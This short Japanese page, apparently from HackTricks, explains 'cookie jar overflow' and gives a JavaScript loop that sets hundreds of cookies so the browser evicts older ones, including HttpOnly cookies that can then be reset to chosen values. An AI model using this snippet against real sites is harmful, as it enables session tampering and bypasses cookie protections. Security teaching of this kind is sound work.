tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

ブラウザには、ページごとに保存できるクッキーの数の制限があります。したがって、何らかの理由でクッキーを消す必要がある場合、クッキージャーをオーバーフローさせることができます。そうすれば、最も古いクッキーが削除されます。

javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

注意してください。異なるドメインを指すサードパーティのクッキーは上書きされません。

caution

この攻撃は、HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットすることができます

これをこのラボの投稿で確認してください

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする